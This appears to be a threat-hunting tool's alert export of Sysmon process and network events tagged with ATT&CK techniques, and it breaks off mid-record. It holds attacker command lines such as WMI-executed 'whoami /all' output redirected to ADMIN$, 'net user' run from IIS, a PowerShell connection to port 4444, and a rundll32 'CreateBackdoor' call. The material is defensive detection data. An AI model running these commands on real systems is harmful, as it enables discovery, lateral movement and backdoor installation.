IEWIN7 + + + + + + 2019-04-30 20:35:13.512 + 365ABB72-B181-5CC8-0000-001023C41E00 + 1256 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1046 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.152 + 365ABB72-4A01-5CE7-0000-00102DA1AC00 + 788 + C:\Windows\System32\net.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" /c net user + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9829 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.356 + 365ABB72-B0F3-5CC8-0000-0010373E1D00 + 3328 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /all + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1046 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.152 + 365ABB72-4A01-5CE7-0000-00102DA1AC00 + 788 + C:\Windows\System32\net.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" /c net user + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 549016 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-04 22:41:04.465 + 747F3D96-BB00-5FCA-0000-001033CD7600 + 8536 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-3407-5FCB-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 341 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.675 + 747F3D96-28B3-5E1E-0000-001032047C00 + 1656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + rundll32 url.dll,OpenURL ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8048 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:21.539 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + C:\Users\IEUser\Desktop\invoke-pipeshell-master\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-6231-5CC7-0000-00104CF71800 + 3940 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578505 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:14.246 + 747F3D96-3A8A-607F-0000-0010E4717700 + 5280 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-82AF-607F-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342407 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:16.721 + 747F3D96-E90C-5F33-0000-0010CB420200 + 3320 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E909-5F33-0000-00108C580000 + 612 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8048 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:21.539 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + C:\Users\IEUser\Desktop\invoke-pipeshell-master\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-6231-5CC7-0000-00104CF71800 + 3940 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9838 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.434 + 365ABB72-B181-5CC8-0000-0010ADBF1E00 + 3372 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 9813 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.794 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + NT AUTHORITY\SYSTEM + tcp + true + false + 10.0.2.18 + IEWIN7 + 49160 + + false + 10.0.2.19 + + 4444 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578503 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:13.680 + 747F3D96-3A89-607F-0000-001028587700 + 4912 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-82AE-607F-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342406 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:14.798 + 747F3D96-E90A-5F33-0000-0010863C0100 + 1740 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E90A-5F33-0000-00102CF20000 + 1180 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - 